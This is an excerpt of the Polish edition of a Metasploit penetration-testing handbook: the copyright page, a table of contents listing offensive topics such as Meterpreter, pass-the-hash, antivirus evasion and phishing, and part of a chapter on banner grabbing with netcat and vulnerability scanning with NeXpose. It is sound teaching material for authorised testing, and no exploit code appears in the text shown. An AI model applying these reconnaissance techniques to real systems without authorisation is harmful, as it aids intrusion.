Tytuł oryginału: Metasploit: The Penetration Tester's Guide
Tłumaczenie: Lech Lachowski
ISBN: 978-83-246-5010-1
Original edition copyright © 2011 by David Kennedy, Jim O’Gorman, Devon Kearns, and Mati Aharoni.All rights reserved.
Published by arrangement with No Starch Press, Inc.
Polish edition copyright 2013 by HELION SA.All rights reserved.
All rights reserved. No part of this book may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording or by any information storage retrieval system, without permission from the Publisher.
Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione. Wykonywanie kopii metodą kserograficzną, fotograficzną, a także kopiowanie książki na nośniku filmowym, magnetycznym lub innym powoduje naruszenie praw autorskich niniejszej publikacji.
Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli.
Autor oraz Wydawnictwo HELION dołożyli wszelkich starań, by zawarte w tej książce informacje były kompletne i rzetelne. Nie biorą jednak żadnej odpowiedzialności ani za ich wykorzystanie, ani za związane z tym ewentualne naruszenie praw patentowych lub autorskich. Autor oraz Wydawnictwo HELION nie ponoszą również żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce.
Wydawnictwo HELIONul. Kościuszki 1c, 44-100 GLIWICEtel. 32 231 22 19, 32 230 98 63e-mail: [email protected]: http://helion.pl (księgarnia internetowa, katalog książek)
Drogi Czytelniku!Jeżeli chcesz ocenić tę książkę, zajrzyj pod adres http://helion.pl/user/opinie/metaspMożesz tam wpisać swoje uwagi, spostrzeżenia, recenzję.
Printed in Poland.
• Kup książkę• Poleć książkę • Oceń książkę
• Księgarnia internetowa• Lubię to! » Nasza społeczność
Spis tre�ci
PRZEDMOWA 11
S�OWO WST�PNE 15
PODZI�KOWANIA 17
WPROWADZENIE 19Dlaczego trzeba przeprowadza� testy penetracyjne? ................................................................20Dlaczego Metasploit? ..................................................................................................................20Krótka historia Metasploit ...........................................................................................................20Na temat tej ksi��ki ......................................................................................................................21Jaka jest zawarto�� tej ksi��ki? ....................................................................................................22Uwagi na temat etyki ...................................................................................................................23
1ABSOLUTNE PODSTAWY TESTÓW PENETRACYJNYCH 25Fazy PTES ....................................................................................................................................26
Czynno�ci wst�pne .................................................................................................................26Zbieranie informacji ...............................................................................................................26Modelowanie zagro�e� ..........................................................................................................27Analiza luk w zabezpieczeniach ............................................................................................27Eksploatacja ............................................................................................................................27Faza poeksploatacyjna ...........................................................................................................28Przygotowanie raportu ...........................................................................................................28
Typy testów penetracyjnych ........................................................................................................29Jawne testy penetracyjne .......................................................................................................29Ukryte testy penetracyjne ......................................................................................................30
Skanery luk w zabezpieczeniach .................................................................................................30Podsumowanie .............................................................................................................................31
4 S p i s t r e � c i
2PODSTAWY METASPLOIT 33Terminologia ................................................................................................................................ 33
Exploit .................................................................................................................................... 34�adunek .................................................................................................................................. 34Kod powoki ........................................................................................................................... 34Modu ..................................................................................................................................... 34Nasuchiwacz ......................................................................................................................... 34
Interfejsy Metasploit ................................................................................................................... 35Konsola MSFconsole ............................................................................................................. 35Interfejs wiersza polece� MSFcli ......................................................................................... 36Armitage ................................................................................................................................. 38
Narz�dzia Metasploit .................................................................................................................. 38MSFpayload ........................................................................................................................... 39MSFencode ............................................................................................................................ 40Nasm Shell ............................................................................................................................. 40
Metasploit Express oraz Metasploit Pro .................................................................................... 41Podsumowanie ............................................................................................................................. 41
3ZBIERANIE INFORMACJI 43Pasywne zbieranie informacji ..................................................................................................... 44
Wyszukiwanie whois ............................................................................................................. 44Netcraft .................................................................................................................................. 45NSLookup .............................................................................................................................. 46
Aktywne zbieranie informacji ..................................................................................................... 47Skanowanie portów za pomoc� narz�dzia Nmap ................................................................ 47Praca z baz� danych w Metasploit ........................................................................................ 49Skanowanie portów za pomoc� Metasploit .......................................................................... 54
Skanowanie ukierunkowane ....................................................................................................... 56Skanowanie bloku wiadomo�ci serwera ............................................................................... 56Polowanie na niewa�ciwie skonfigurowane serwery Microsoft SQL ................................ 57Skanowanie serwera SSH ..................................................................................................... 58Skanowanie FTP .................................................................................................................... 59Zamiatanie SNMP ................................................................................................................. 60
Pisanie niestandardowych skanerów .......................................................................................... 61Wybiegaj�c naprzód .................................................................................................................... 64
S p i s t r e � c i 5
4SKANOWANIE LUK W ZABEZPIECZENIACH 65Podstawowe skanowanie luk w zabezpieczeniach .....................................................................66Skanowanie za pomoc� NeXpose ................................................................................................67
Konfiguracja ...........................................................................................................................68Importowanie raportu do Metasploit Framework ...............................................................73Uruchamianie NeXpose z poziomu MSFconsole ................................................................74
Skanowanie za pomoc� aplikacji Nessus ....................................................................................76Konfiguracja skanera Nessus .................................................................................................76Tworzenie polityki skanowania Nessusa ...............................................................................77Uruchamianie skanowania za pomoc� Nessusa ....................................................................79Raporty skanera Nessus .........................................................................................................80Importowanie wyników do Metasploit Framework .............................................................80Skanowanie za pomoc� Nessusa z poziomu Metasploit ......................................................81
Wyspecjalizowane skanery luk w zabezpieczeniach .................................................................84Potwierdzanie logowania SMB .............................................................................................84Skanowanie w poszukiwaniu otwartego uwierzytelniania VNC .........................................86Skanowanie w poszukiwaniu otwartych serwerów X11 ......................................................88
Wykorzystywanie wyników skanowania do autopwningu .........................................................89
5PRZYJEMNO�� EKSPLOATACJI 91Podstawowa eksploatacja .............................................................................................................92
Polecenie msf> show exploits ...............................................................................................92Polecenie msf> show auxiliary .............................................................................................92Polecenie msf> show options ...............................................................................................92Polecenie msf> show payloads .............................................................................................94Polecenie msf> show targets ................................................................................................96Polecenie info .........................................................................................................................97Polecenia set i unset ...............................................................................................................97Polecenia setg i unsetg ...........................................................................................................98Polecenie save ........................................................................................................................98
Twoja pierwsza eksploatacja .......................................................................................................99Eksploatacja maszyny Ubuntu ..................................................................................................104�adunki sprawdzaj�ce wszystkie porty ....................................................................................106Pliki zasobów ..............................................................................................................................108Podsumowanie ...........................................................................................................................110
6 S p i s t r e � c i
6METERPRETER 111Przejmowanie maszyny wirtualnej Windows XP .................................................................... 112
Skanowanie portów za pomoc� narz�dzia Nmap .............................................................. 112Atak na MS SQL .................................................................................................................. 113Siowy atak na MS SQL Server .......................................................................................... 114Rozszerzona procedura xp_cmdshell ................................................................................. 115Podstawowe polecenia Meterpretera ................................................................................. 117Przechwytywanie uderze� klawiatury ................................................................................ 118
Wykonywanie zrzutów nazw u�ytkownika i hase .................................................................. 120Wyodr�bnianie skrótów hase ............................................................................................. 120Zrzuty skrótów hase ........................................................................................................... 121
Technika pass-the-hash ............................................................................................................. 122Zwi�kszanie uprawnie� ............................................................................................................ 123Zastosowanie tokenów personifikacji ....................................................................................... 125Zastosowanie polecenia ps ........................................................................................................ 125Pivoting innych systemów ........................................................................................................ 127Stosowanie skryptów Meterpretera ......................................................................................... 131
Migracja procesu ................................................................................................................. 132Unieruchamianie oprogramowania antywirusowego ........................................................ 132Uzyskiwanie skrótów hase do systemu ............................................................................. 132ledzenie caego ruchu na maszynie docelowej ................................................................ 133Scrapowanie systemu .......................................................................................................... 133Zastosowanie skryptu persystencji ..................................................................................... 133
Wykorzystywanie moduów fazy poeksploatacyjnej ............................................................... 135Uaktualnianie powoki polece� do Meterpretera .................................................................... 135Operowanie interfejsami API systemu Windows za pomoc� dodatku Railgun .................... 137Podsumowanie ........................................................................................................................... 138
7UNIKANIE WYKRYCIA 139Tworzenie samodzielnych plików binarnych za pomoc� MSFpayload ................................. 140Unikanie wykrycia przez program antywirusowy ................................................................... 142
Kodowanie za pomoc� narz�dzia MSFencode .................................................................. 142Wielokrotne kodowanie ...................................................................................................... 144
Niestandardowe szablony plików wykonywalnych ................................................................. 146Potajemne uruchamianie adunku ............................................................................................ 147Programy kompresuj�ce ............................................................................................................ 149Ko�cowe uwagi dotycz�ce unikania wykrycia przez oprogramowanie antywirusowe ......... 150
S p i s t r e � c i 7
8WYKORZYSTANIE ATAKÓW TYPU CLIENT-SIDE 151Exploity przegl�darek ................................................................................................................152
Jak dziaaj� exploity przegl�darek .......................................................................................153Rzut oka na instrukcje NOP ................................................................................................154
Wykorzystanie programu Immunity Debugger do odczytywania kodu powoki NOP .........155Aurora — exploit przegl�darki Internet Explorer ...................................................................158Podatno�� formatu pliku ............................................................................................................163Przesyanie adunku ...................................................................................................................164Podsumowanie ...........................................................................................................................165
9MODU�Y POMOCNICZE METASPLOIT 167Moduy pomocnicze w dziaaniu ..............................................................................................170Budowa moduu pomocniczego ................................................................................................173Wybiegaj�c naprzód ...................................................................................................................178
10PAKIET NARZ�DZI SOCJOTECHNICZNYCH — SOCIAL-ENGINEER TOOLKIT 179Konfiguracja pakietu Social-Engineer Toolkit .........................................................................180Wektor ataku spear-phishing ....................................................................................................181Wektory ataków WWW .............................................................................................................187
Aplet Javy ..............................................................................................................................187Exploity WWW typu client-side .........................................................................................192Zbieranie nazw u�ytkowników i hase ................................................................................194Tabnabbing ...........................................................................................................................196Atak typu man-left-in-the-middle .......................................................................................196Metoda Web Jacking ............................................................................................................197Atak wieloaspektowy ............................................................................................................199
Zainfekowane no�niki danych ...................................................................................................204Wektor ataku Teensy USB HID ...............................................................................................204Dodatkowe funkcje pakietu SET ..............................................................................................207Wybiegaj�c naprzód ...................................................................................................................208
11FAST-TRACK 209Wstrzykni�cie Microsoft SQL ...................................................................................................210
Narz�dzie SQL Injector — atak z wykorzystaniem a�cucha zapytania ..........................211Narz�dzie SQL Injector — atak z wykorzystaniem parametru POST .............................212R�czne wstrzykiwanie ..........................................................................................................213Narz�dzie MSSQL Bruter ...................................................................................................215Narz�dzie SQLPwnage ........................................................................................................219
8 S p i s t r e � c i
Generator zmiany formatu z binarnego na heksadecymalny .................................................. 222Zmasowany atak typu client-side ............................................................................................. 222Kilka sów na temat automatyzacji ........................................................................................... 225
12KARMETASPLOIT 227Konfiguracja ............................................................................................................................... 228Uruchamianie ataku .................................................................................................................. 230Zbieranie po�wiadcze� .............................................................................................................. 232Uzyskiwanie dost�pu do powoki ............................................................................................. 233Podsumowanie ........................................................................................................................... 236
13TWORZENIE W�ASNYCH MODU�ÓW 237Wykonywanie polece� na Microsoft SQL ............................................................................... 238Analiza gotowego moduu Metasploit ...................................................................................... 240Tworzenie nowego moduu ...................................................................................................... 241
PowerShell ........................................................................................................................... 242Uruchamianie exploita powoki .......................................................................................... 243Definiowanie funkcji powershell_upload_exec ................................................................. 245Konwersja z formatu heksadecymalnego na format binarny ............................................ 246Liczniki ................................................................................................................................. 247Uruchamianie exploita ........................................................................................................ 249
Korzy�ci pyn�ce z wykorzystywania istniej�cego kodu ......................................................... 250
14TWORZENIE W�ASNYCH EXPLOITÓW 251Sztuka fuzzingu .......................................................................................................................... 252Kontrolowanie SEH .................................................................................................................. 256Omijanie ogranicze� SEH ........................................................................................................ 258Uzyskiwanie adresu zwrotnego ................................................................................................ 261Ze znaki i zdalne wykonywanie kodu ...................................................................................... 266Podsumowanie ........................................................................................................................... 269
15IMPORTOWANIE EXPLOITÓW DO METASPLOIT FRAMEWORK 271Podstawy j�zyka asemblera ....................................................................................................... 272
Rejestry EIP i ESP .............................................................................................................. 272Zestaw instrukcji JMP ......................................................................................................... 272Instrukcje NOP i NOP slide’y ............................................................................................ 272
S p i s t r e � c i 9
Importowanie exploita przepenienia bufora ...........................................................................273Rozkadanie na cz��ci gotowego exploita ...........................................................................274Konfigurowanie definicji exploita .......................................................................................276Testowanie podstawowego exploita ....................................................................................276Implementowanie funkcji Metasploit Framework ............................................................278Dodawanie randomizacji .....................................................................................................279Usuwanie NOP slide ............................................................................................................280Usuwanie fikcyjnego kodu powoki ....................................................................................280Kompletny modu ................................................................................................................281
Exploit nadpisania rekordu SEH ..............................................................................................283Podsumowanie ...........................................................................................................................291
16J�ZYK SKRYPTOWY METERPRETERA 293Podstawy j�zyka skryptowego Meterpretera ...........................................................................293Interfejs API Meterpretera .......................................................................................................300
Wy�wietlanie komunikatów .................................................................................................300Podstawowe wywoania API ................................................................................................301Domieszki Meterpretera .....................................................................................................302
Zasady pisania skryptów Meterpretera .....................................................................................304Tworzenie wasnego skryptu Meterpretera .............................................................................304Podsumowanie ...........................................................................................................................311
17SYMULOWANY TEST PENETRACYJNY 313Czynno�ci wst�pne ....................................................................................................................314Zbieranie informacji ...................................................................................................................314Modelowanie zagro�e� ..............................................................................................................315Eksploatacja ................................................................................................................................317Dostosowywanie MSFconsole ..................................................................................................318Faza poeksploatacyjna ...............................................................................................................319
Skanowanie systemu Metasploitable ..................................................................................321Identyfikacja usug podatnych na ataki ...............................................................................322
Atak na serwer Apache Tomcat .................................................................................................323Atakowanie nietypowych usug .................................................................................................326Zacieranie �ladów .......................................................................................................................327Podsumowanie ...........................................................................................................................330
10 S p i s t r e � c i
AKONFIGURACJA MASZYN TESTOWYCH 331Instalacja i konfiguracja systemów ........................................................................................... 331Uruchamianie maszyn wirtualnych z systemem Linux ........................................................... 332Przygotowywanie instalacji Windows XP podatnej na ataki .................................................. 333
Konfiguracja serwera WWW na systemie Windows XP ................................................... 333Instalacja i konfiguracja serwera SQL ................................................................................ 334Tworzenie podatnej na ataki aplikacji WWW ................................................................... 336Aktualizacja systemu Back|Track ....................................................................................... 339
B�CI�GAWKA 341Polecenia MSFconsole .............................................................................................................. 341Polecenia Meterpretera ............................................................................................................ 343Polecenia MSFpayload ............................................................................................................. 346Polecenia MSFencode .............................................................................................................. 346Polecenia MSFcli ...................................................................................................................... 347MSF, Ninja, Fu ......................................................................................................................... 347MSFvenom ................................................................................................................................ 348Polecenia Meterpretera dla fazy poeksploatacyjnej ................................................................ 348
SKOROWIDZ 351
4Skanowanie luk
w zabezpieczeniach
Skaner luk w zabezpieczeniach (ang. vulnerability scanner) jest zautomatyzo-wanym programem przeznaczonym do wyszukiwania sabych punktów kom-puterów, systemów komputerowych, sieci oraz aplikacji. Program ten sondujesystem, wysyaj�c do niego poprzez sie� porcj� danych i analizuj�c otrzymaneodpowiedzi. Ma to na celu enumeracj� wszelkich luk w zabezpieczeniach celupoprzez wykorzystanie jako punktu odniesienia wasnej bazy danych luk w za-bezpieczeniach.
Ró�ne systemy operacyjne zazwyczaj odmiennie reaguj� na wysyane próbkisieciowe z uwagi na wykorzystywanie ró�nych implementacji sieciowych. Teunikatowe odpowiedzi su�� jako odcisk palca (ang. fingerprint), który jest wy-korzystywany przez skaner luk w zabezpieczeniach do okre�lenia wersji systemuoperacyjnego, a nawet poziomu zainstalowanych poprawek. Skaner luk w za-bezpieczeniach mo�e równie� wykorzystywa� zestawy po�wiadcze� u�ytkowni-ka w celu zalogowania si� do zdalnego systemu i dokonania enumeracji opro-gramowania i usug, co pozwala okre�li�, czy system jest zaatany. Na podstawieuzyskanych wyników przedstawia raport wyliczaj�cy wszystkie luki w zabezpie-czeniach wykryte w danym systemie. Taki raport mo�e by� u�yteczny zarównodla administratorów sieci, jak i dla pentesterów.
66 R o z d z i a � 4
Skanery luk w zabezpieczeniach zasadniczo generuj� du�y ruch w sieci i dla-tego nie s� zazwyczaj wykorzystywane w testach penetracyjnych, kiedy jednymz zao�e� jest pozostanie niewykrytym. Je�li jednak przeprowadzasz test pene-tracyjny, w przypadku którego wykrycie nie stanowi problemu, to taki skanermo�e zaoszcz�dzi� Ci r�cznego sondowania systemów w celu okre�lenia luk w za-bezpieczeniach oraz poziomów zainstalowanych poprawek.
Bez wzgl�du na to, czy korzystasz ze zautomatyzowanych skanerów, czy wy-konujesz te dziaania r�cznie, skanowanie jest zawsze jednym z najbardziej istot-nych elementów w procesie przeprowadzania testów penetracyjnych. Je�li zo-stanie ono wykonane dokadnie, b�dzie stanowio najwi�ksz� warto�� dla Twojegoklienta. W tym rozdziale omówimy szereg skanerów luk w zabezpieczeniachoraz sposoby ich integracji z Metasploit. Wska�emy równie� kilka moduówpomocniczych w Metasploit Framework, które mog� lokalizowa� okre�lone lukiw zabezpieczeniach systemów zdalnych.
Podstawowe skanowanie lukw zabezpieczeniach
Przyjrzyjmy si�, jak dziaa skanowanie na najbardziej podstawowym poziomie.W zamieszczonym poni�ej listingu zastosujemy netcat do przechwycenia baneruz celu o adresie IP 192.168.1.203. Przychwytywanie banerów (ang. banner grabbing)polega na po�czeniu si� z usug� zdalnej sieci i odczytaniu zwracanego identy-fikatora (baneru) tej usugi. Wiele usug sieciowych, takich jak WWW, transferplików oraz serwery pocztowe, zwraca swoje banery natychmiast po nawi�zaniuz nimi po�czenia lub w odpowiedzi na okre�lone polecenie. Po�czymy si� te-raz z serwerem WWW na porcie TCP 80 i wy�lemy ��danie GET HTTP, któreumo�liwi nam przyjrzenie si� nagówkowi informacji zwracanej przez ten zdal-ny serwer w odpowiedzi na nasze ��danie.
root@bt:/opt/framework3/msf3# nc 192.168.1.203 80GET HTTP 1/1HTTP/1.1 400 Bad Request
� Server: Microsoft-IIS/5.1
Informacja zwrócona w punkcie � informuje nas, �e system dziaaj�cy naporcie 80 jest serwerem WWW opartym na Microsoft IIS 5.1. Uzbrojeni w t�informacj� mogliby�my wykorzysta� skaner luk w zabezpieczeniach, tak jak po-kazuje to rysunek 4.1, do okre�lenia, czy ta wersja IIS posiada jakie� luki w za-bezpieczeniach i czy ten konkretny serwer ma zainstalowane poprawki.
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 67
Rysunek 4.1. Wyniki skanowania luk w zabezpieczeniach docelowego serwera WWW
Oczywi�cie w praktyce nie jest to takie proste. Skanery luk w zabezpiecze-niach cz�sto generuj� wiele wyników fa�szywie pozytywnych (ang. false positives,np. raportowanie luki w zabezpieczeniach tam, gdzie jej nie ma) oraz fa�szywienegatywnych (ang. false negatives, np. niewykrycie luki w zabezpieczeniachtam, gdzie ona istnieje). Ma to zwi�zek z subtelnymi ró�nicami w konfiguracjisystemów i aplikacji. Ponadto twórcy skanerów luk w zabezpieczeniach maj�motywacj�, by skanery zgaszay jak najwi�cej pozytywnych wyników, poniewa�im wi�cej „trafie�”, tym lepiej wygl�da to dla potencjalnego nabywcy. Skanery lukw zabezpieczeniach s� na tyle dobre, na ile dobre s� ich bazy danych. Mo�na jerównie� atwo oszuka� za pomoc� faszywych banerów lub niespójnych konfiguracji.
Przyjrzyjmy si� kilku najbardziej u�ytecznym skanerom luk w zabezpiecze-niach, takim jak NeXpose, Nessus oraz inne wyspecjalizowane skanery.
Skanowanie za pomoc� NeXposeNeXpose to dostarczony przez Rapid7 skaner luk w zabezpieczeniach, który ska-nuje sieci w celu identyfikacji dziaaj�cych w nich urz�dze� oraz przeprowadzakontrol�, �eby okre�li� sabe punkty bezpiecze�stwa systemów operacyjnychi aplikacji. Nast�pnie dane uzyskane podczas skanowania s� analizowane i prze-twarzane do za�czenia w ró�nych raportach.
Rapid7 oferuje wiele wersji skanera NeXpose, jednak my skorzystamy z edycjiCommunity, poniewa� jest ona darmowa. Je�li zamierzasz wykorzystywa� NeXposew celach komercyjnych, sprawd� informacje na temat ró�nych wersji tej aplikacji,ich funkcji oraz cen na stronie Rapid7 (http://www.rapid7.com/vulnerability-scanner.jsp).
Celem naszego skanowania b�dzie domy�lna instalacja Windows XP SP2, skon-figurowana wedug wskazówek z za�cznika A. Najpierw wykonamy podstawoweskanowanie jawne naszego celu i zaimportujemy wyniki do Metasploit. T� sek-cj� zako�czymy omówieniem sposobu przeprowadzania skanowania NeXposebezpo�rednio z poziomu msfconsole zamiast korzystania z interfejsu WWW, coeliminuje konieczno�� importowania wyników skanowania.
68 R o z d z i a � 4
KonfiguracjaPo zainstalowaniu NeXpose Community otwórz przegl�dark� i wpisz w paskuadresowym https://<twój_adres_ip>:3780. Zaakceptuj certyfikat z podpisem wa-snym NeXpose i zaloguj si�, u�ywaj�c po�wiadcze�, które podae� podczas instalacji.Powinien si� teraz uruchomi� interfejs podobny do pokazanego na rysunku 4.2.(Dokadne instrukcje instalacji NeXpose znajdziesz na stronie Rapid7).
Rysunek 4.2. Zak�adka Home startowego interfejsu NeXpose
Na górnym pasku na gównej stronie NeXpose dost�pnych jest kilka zakadek:
� Zakadka Assets (zasoby) w punkcie � wy�wietla szczegóyprzeskanowanych komputerów i innych urz�dze� w Twojej sieci.
� Zakadka Reports (raporty) w punkcie � zawiera list� wygenerowanychraportów ze skanowania luk w zabezpieczeniach.
� Zakadka Vulnerabilities (luki w zabezpieczeniach) w punkcie � zawieraszczegóy dotycz�ce wszelkich luk w zabezpieczeniach, wykrytychpodczas przeprowadzonych skanowa�.
� Zakadka Administration (administrowanie) w punkcie � umo�liwiakonfiguracj� ró�nych opcji.
Przyciski znajduj�ce si� w gównym obszarze interfejsu umo�liwiaj� wyko-nywanie typowych zada�, takich jak tworzenie nowego �rodowiska lub definio-wanie nowego skanowania luk w zabezpieczeniach.
Kreator nowego �rodowiskaZanim rozpoczniesz skanowanie luk w zabezpieczeniach za pomoc� NeXpose,musisz skonfigurowa� �rodowisko (ang. site) — logiczne zestawienie elementów,takich jak okre�lona podsie�, grupa serwerów, a nawet pojedyncze stacje robocze.Takie �rodowiska b�d� nast�pnie skanowane przez NeXpose, a dla ka�dego kon-kretnego �rodowiska mo�na zdefiniowa� ró�ne rodzaje skanowania.
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 69
1. Aby utworzy� nowe �rodowisko, kliknij przycisk New Site w zakadceHome skanera NeXpose, wprowad� nazw� strony (pole Name) oraz krótkiopis (pole Description), a nast�pnie kliknij przycisk Next.
2. Na kolejnym etapie, przedstawionym na rysunku 4.3, mo�esz szczegóowozdefiniowa� swoje cele. Mo�esz doda� pojedynczy adres IP, zakresadresów IP, nazwy hostów itd. Mo�esz równie� wy�czy� ze skanowaniaurz�dzenia, takie jak drukarki. (Drukarki zazwyczaj niezbyt dobrzereaguj� na skanowanie. Mieli�my do czynienia z przypadkami, kiedyproste skanowanie luk w zabezpieczeniach powodowao uruchomieniew drukarce kolejki drukowania ponad miliona czarnych stron!).Po zako�czeniu dodawania (pole Included Devices) i wy�czania(pole Excluded Devices) urz�dze� ze skanowania kliknij przycisk Next.
Rysunek 4.3. Dodawanie urz�dze� do nowego �rodowiska NeXpose
3. Teraz masz do wyboru kilka ró�nych szablonów skanowania(Scan Template), takich jak Discovery Scan (skanowanie ujawniaj�ce)lub Penetration test (test penetracyjny). Mo�esz równie� wybra� silnikskanowania (Scan Engine) oraz zdefiniowa� harmonogram automatycznegoskanowania (Scan Schedule). Dla celów niniejszego omówienia procedurypozostaw warto�ci domy�lne i kliknij przycisk Next.
4. Je�li posiadasz po�wiadczenia (ang. credentials) dla �rodowiska, którechcesz skanowa�, to mo�esz je doda� na tym etapie. Po�wiadczenia mog�pomóc w wygenerowaniu bardziej dokadnych i kompletnych wynikówdzi�ki dog�bnej enumeracji zainstalowanego oprogramowania i politykisystemu danego celu.
70 R o z d z i a � 4
5. W zakadce Credentials kliknij przycisk New Login, podaj nazw�u�ytkownika i haso dla adresu IP, który chcesz skanowa�, a nast�pniekliknij Test Login, �eby je zweryfikowa�. Zapisz po�wiadczenia.
6. Na koniec kliknij przycisk Save, aby zako�czy� dziaanie kreatora nowego�rodowiska i powróci� do zakadki Home. W tej zakadce powinno by� terazwidoczne nowe �rodowisko, które wa�nie dodae�. Pokazuje to rysunek 4.4.
Rysunek 4.4. Zak�adka Home, na której wida� informacj� o nowo utworzonym�rodowisku
Kreator nowego skanowania r�cznegoJe�li skonfigurowae� ju� nowe �rodowisko, mo�esz przygotowa� pierwszeskanowanie:
1. Kliknij przycisk New Manual Scan (nowe skanowanie r�czne), widocznyna rysunku 4.4. Powinno zosta� wy�wietlone okno dialogowe Start NewScan (rozpocznij nowe skanowanie), tak jak na rysunku 4.5. W tym okniedefiniujesz elementy, które chcesz skanowa� (Included assets), oraz te,które chcesz ze skanowania wy�czy� (Excluded assets). W tym przykadzieb�dziemy skanowa� nasz domy�lny system Windows XP.
2. Sprawd� dobrze docelowy adres IP, aby upewni� si�, �e nie przeskanujeszprzypadkowo niewa�ciwego urz�dzenia lub sieci. Kliknij przycisk Start Now,�eby rozpocz��.
3. NeXpose powinien automatycznie od�wie�a� bie��c� stron� w miar�post�pów skanowania. Poczekaj, a� status dla Scan Progress (post�pskanowania) oraz Discovered Assets (odkryte zasoby) b�dzie wskazywaCompleted (zako�czone), tak jak wida� to na rysunku 4.6. W sekcjiScan Progress mo�esz zobaczy�, �e skanowanie naszego pojedynczegourz�dzenia doprowadzio do wykrycia 268 luk w zabezpieczeniach.Z kolei sekcja Discovered Assets zawiera wi�cej informacji na temat celu,takich jak nazwa urz�dzenia oraz jego system operacyjny. Przejd� terazdo zakadki Reports.
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 71
Rysunek 4.5. Okno dialogowe konfiguracji skanowania w NeXpose
Rysunek 4.6. Uko�czone skanowanie w NeXpose
Kreator nowego raportuJe�li uruchomie� NeXpose po raz pierwszy i uko�czye� tylko jedno skanowanie,to zakadka Reports powinna pokazywa�, �e nie masz wygenerowanego �adnegoraportu.
1. Aby uruchomi� kreatora nowego raportu, kliknij przycisk New Report,tak jak pokazuje to rysunek 4.7.
72 R o z d z i a � 4
Rysunek 4.7. Zak�adka Reports skanera NeXpose
2. W polu Report name wprowad� nazw�, jak� wybrae� dla danego raportu.W polu Report format wybierz opcj� NeXpose Simple XML Report, co umo�liwiCi zaimportowanie wyników skanowania do Metasploit. Mo�esz równie�wybra� szablon raportu w polu Report template oraz skonfigurowa� odpowiedni�stref� czasow� w polu Report time zone, je�li na przykad przeprowadzaszswój test penetracyjny w podró�y. Wspomniane opcje przedstawionezostay na rysunku 4.8. Kliknij przycisk Next, je�li chcesz kontynuowa�.
Rysunek 4.8. Wybór nazwy i formatu raportu
3. W kolejnym oknie dodaj urz�dzenia, które maj� by� w�czone do raportu,klikaj�c Select Sites (wybierz �rodowiska) i dodaj�c zakres przeskanowanegocelu, tak jak pokazuje to rysunek 4.9. Nast�pnie kliknij Save (zapisz).
Rysunek 4.9. Wybór �rodowiska, które ma by� za��czone w raporcie
S k a n o w a n i e l u k w z a b e z p i e c ze n i a ch 73
4. W oknie dialogowym Select Devices wybierz elementy docelowe, któremaj� by� za�czone w Twoim raporcie. Nast�pnie kliknij Save.
5. B�d�c na powrót w oknie Report Configuration (konfiguracja raportu),kliknij Save, aby zaakceptowa� pozostae warto�ci domy�lne dla danegoraportu. Na li�cie w zakadce Reports powinien teraz pojawi� si� nowoutworzony raport, tak jak przedstawia to rysunek 4.10. (Pami�taj, �ebyzapisa� plik raportu, aby móc u�y� go w Metasploit Framework).
Rysunek 4.10. Zak�adka Reports wy�wietlaj�ca list� raportów
Importowanie raportu do Metasploit FrameworkPo przeprowadzeniu penego skanowania luk w zabezpieczeniach za pomoc�aplikacji NeXpose musisz zaimportowa� wyniki do Metasploit. Zanim jednak tozrobisz, powiniene� utworzy� now� baz� danych, stosuj�c polecenie db_connectz poziomu msfconsole. Po utworzeniu bazy danych mo�esz zaimportowa� plikXML z NeXpose za pomoc� polecenia db_import. Metasploit automatycznie wy-kryje, �e dany plik pochodzi z aplikacji NeXpose, i zaimportuje przeskanowanegohosta. Teraz mo�esz zweryfikowa� poprawno�� przeprowadzonego importu, wpi-suj�c polecenie db_hosts. (Wymienione czynno�ci przedstawia poni�szy listing).Jak mo�esz zauwa�y� w punkcie �, Metasploit posiada teraz informacje o 268lukach w zabezpieczeniach, wykrytych podczas przeprowadzonego przez Ciebieskanowania.
msf > db_connect postgres:[email protected]/msf3msf > db_import /tmp/host_195.xml[*] Importing 'NeXpose Simple XML' data[*] Importing host 192.168.1.195[*] Successfully imported /tmp/host_195.xml
msf > db_hosts -c address,svcs,vulns
Hosts=====address Svcs Vulns Workspace------- ---- ----- ---------192.168.1.195 8 268 � default
74 R o z d z i a � 4
Aby wy�wietli� wszystkie szczegóy luk w zabezpieczeniach zaimportowanychdo Metasploit, w tym liczb� typowych luk w zabezpieczeniach i ekspozycji (ang.Common Vulnerabilities and Exposures — CVE), zastosuj poni�sze polecenie:
msf > db_vulns
Jak widzisz, przeprowadzenie jawnego skanowania luk w zabezpieczeniachz penymi po�wiadczeniami mo�e dostarczy� niesamowitej ilo�ci informacji — w tymprzypadku odnaleziono 268 luk w zabezpieczeniach. Jednak z oczywistych wzgl�-dów byo to skanowanie charakteryzuj�ce si� wysokim poziomem szumów, któreprawdopodobnie przyci�gn�y du�o uwagi. Tego rodzaju skanowania najlepiejsprawdzaj� si� w testach penetracyjnych niewymagaj�cych potajemnych dziaa�.
Uruchamianie NeXpose z poziomu MSFconsoleUruchamianie aplikacji NeXpose z poziomu interfejsu graficznego WWW do-skonale sprawdza si� w przypadku precyzyjnego skanowania luk w zabezpiecze-niach oraz generowania raportów. Je�li jednak wolisz pozosta� przy msfconsole,tak�e mo�esz przeprowadzi� pene skanowanie luk w zabezpieczeniach — dzi�kiwtyczce NeXpose do�czonej do Metasploit.
Aby zademonstrowa� ró�nic� w wynikach pomi�dzy po�wiadczonym i nie-po�wiadczonym skanowaniem, uruchomimy teraz skanowanie z Metasploit bezokre�lania nazwy u�ytkownika i hasa dla docelowego systemu. Zanim rozpocz-niesz, usu� wszystkie istniej�ce bazy danych za pomoc� polecenia db_destroy,utwórz now� baz� danych w Metasploit za pomoc� polecenia db_connect, a na-st�pnie zaaduj wtyczk� NeXpose, stosuj�c polecenie load nexpose. Ilustruje toponi�szy listing.
msf > db_destroy postgres:[email protected]/msf3[*] Warning: You will need to enter the password at the prompts belowPassword:
msf > db_connect postgres:[email protected]/msf3
msf > load nexpose
[*] NeXpose integration has been activated[*] Successfully loaded plugin: nexpose
